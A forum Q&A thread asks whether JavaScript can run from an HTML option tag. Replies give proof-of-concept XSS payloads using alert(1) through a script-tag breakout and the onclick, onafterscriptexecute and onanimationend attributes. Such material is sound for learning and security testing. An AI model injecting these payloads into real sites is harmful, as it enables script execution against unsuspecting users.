# HTML Option Tag XSS

Tags: xss, javascript

Is it possible to inject javascript inside of an HTML option tag?

For example, say you have the following html:

```
<select>
    <option MALISCIOUS_CODE_HERE>Option Description</option>
</select>
```

If you were unable to break out of the tag itself, are there any attributes which would allow you to run javascript (or any other tricks) in this scenario? If this were a div, you could add an onclick event and run javascript this way for example.

Comment: onload isn't supported in the option tag (https://www.w3schools.com/jsref/event_onload.asp)

Comment: Lots of options ... all depends on what else is going on ... browser, delivery, injection method etc ... `<option f="""><SCRIPT>alert("XSS")</SCRIPT>"\>">Option Description</option>`

Answer (score 2, accepted):

There are quite a number of valid event attributes for an `option` tag.

portswigger has a nice [list of event attributes](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) for any given tag (just select the `option` as tag).

`onclick` eg works in firefox:

```
<select>
<option onclick="alert(1)">test</option>
</select>
```

It will execute when you select (ie click on) the option in question.

`onfterscriptexecute` will work in firefox without user interaction, as long as the page contains javascript that will execute:

```
<option onafterscriptexecute=alert(1)><script>1</script>
```

portswigger is a bit outdated on Chrome (most of the payloads I tried do not work anymore), but eg this still works:

```
<style>@keyframes x{}</style>
<select><option style="animation-name:x" onanimationend="alert(1)"></option>
</select>
```

It requires a pre-defined animation code (via `keyframes`) on the target page though.

Comment: That's perfect, thank you! The XSS Cheat-sheet on Portswigger is exactly what I needed